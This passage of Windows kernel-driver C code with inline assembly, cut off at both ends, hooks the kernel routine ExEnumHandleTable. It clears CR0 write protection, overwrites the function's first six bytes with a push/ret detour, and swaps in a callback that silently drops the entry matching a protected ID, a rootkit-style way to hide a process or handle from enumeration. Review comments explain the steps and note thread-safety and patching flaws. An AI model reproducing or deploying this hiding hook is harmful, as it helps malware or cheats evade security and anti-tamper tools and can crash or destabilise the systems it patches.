p; } }
/*
 * Replacement enumeration callback that NewExEnumHandleTable substitutes for
 * the caller's own callback.
 *
 * HANDLE_TALBE_ENTRY (spelling kept from the original), PID and Param are the
 * three arguments ExEnumHandleTable hands to its callback. The entry whose
 * second argument equals the file-level global ProtectID is swallowed: the
 * function returns FALSE without forwarding, so the original caller never
 * sees it. Every other entry is forwarded unchanged to OldCallback, the
 * caller's original callback saved by the hook.
 *
 * NOTE(review): the second argument is named PID here, but ExEnumHandleTable
 * walks whichever handle table the caller passes in, so whether this value
 * is a process id or an ordinary handle depends on the caller's table.
 * OldCallback and ProtectID are globals defined outside this listing.
 */
BOOL FilterCallback(DWORD HANDLE_TALBE_ENTRY, DWORD PID, PVOID Param)
{
    /* The protected entry is dropped; FALSE is the "not handled" answer. */
    if (PID == (DWORD)ProtectID) {
        return FALSE;
    }

    /* Everything else reaches the caller's real callback untouched. */
    return OldCallback(HANDLE_TALBE_ENTRY, PID, Param);
}
/*
 * Detour body that PatchExEnumHandleTable installs over the first six bytes
 * of ExEnumHandleTable (a `push <addr>; ret` stub, see the 0x68 / 0xC3 bytes
 * built in PatchExEnumHandleTable). It receives the caller's arguments
 * unchanged and does the following:
 *   1. saves the caller's Callback in the global OldCallback;
 *   2. substitutes FilterCallback as the callback argument;
 *   3. writes the six saved prologue bytes (ResumCodeExEnumHandleTable) back
 *      over the real function so it can be called;
 *   4. calls the real ExEnumHandleTable with the filtered callback;
 *   5. writes the six detour bytes (CrackCodeExEnumHandleTable) back,
 *      re-arming the hook.
 *
 * NOTE(review): OldCallback is a single file-level global, so two threads
 * enumerating concurrently overwrite each other's saved callback, and while
 * step 3 is in effect any other caller reaches the unpatched function. The
 * prologue writes in steps 3 and 5 are also not bracketed by the CR0.WP
 * clear/restore that PatchExEnumHandleTable uses for the initial patch;
 * whether that is safe depends on how the kernel image is mapped — confirm
 * before relying on it. Handle is passed straight through.
 */
VOID NewExEnumHandleTable(PULONG HandleTable, PVOID Callback, PVOID Param, PHANDLE Handle OPTIONAL)
{
    OldCallback = Callback;     // keep the caller's callback so FilterCallback can forward to it
    Callback = FilterCallback;  // the real routine will now invoke our filter instead

    _asm // restore: put the original six prologue bytes back
    {
        pushad
        mov edi, OldExEnumHandleTable
        mov eax, dword ptr ResumCodeExEnumHandleTable[0]
        mov [edi], eax
        mov ax, word ptr ResumCodeExEnumHandleTable[4]
        mov [edi+4], ax
        popad
    }

    OldExEnumHandleTable(HandleTable, Callback, Param, Handle OPTIONAL);

    _asm // re-patch: put the push/ret detour back
    {
        pushad
        mov edi, OldExEnumHandleTable
        mov eax, dword ptr CrackCodeExEnumHandleTable[0]
        mov [edi], eax
        mov ax, word ptr CrackCodeExEnumHandleTable[4]
        mov [edi+4], ax
        popad
    }

    return;
}
NTSTATUS PatchExEnumHandleTable() { NTSTATUS Status;
OldExEnumHandleTable = (EXENUMHANDLETABLE) GetFunctionAddr(L"ExEnumHandleTable");
if ( OldExEnumHandleTable == NULL ) { DbgPrint("Get ExEnumHandleTable Addr Error!!"); return STATUS_DEVICE_CONFIGURATION_ERROR; }
_asm //关中断 { CLI MOV EAX, CR0 AND EAX, NOT 10000H MOV CR0, EAX } _asm { pushad //获取ExEnumHandleTable函数的地址并保留该函数的起始六个字节 mov edi, OldExEnumHandleTable mov eax, [edi] mov dword ptr ResumCodeExEnumHandleTable[0], eax mov ax, [edi+4] mov word ptr ResumCodeExEnumHandleTable[4], ax //构造要替换的代码,使得系统调用该函数时跳到我们构造的NewExEnumHandleTable去执行 mov byte ptr CrackCodeExEnumHandleTable[0], 0x68 lea edi, NewExEnumHandleTable mov dword ptr CrackCodeExEnumHandleTable[1], edi mov byte ptr CrackCodeExEnumHandleTable[5], 0xC3
//把构造好的代码进心替换 mov edi, OldExEnumHandleTable mov eax, dword ptr CrackCodeExEnumHandleTable[0] mov dword ptr[edi], eax mov ax, word ptr CrackCodeExEnumHandleTable[4] mov word ptr[edi+4], ax popad }
_asm //开中断 { MOV EAX, CR0 OR EAX, 10000H MOV CR0, EAX STI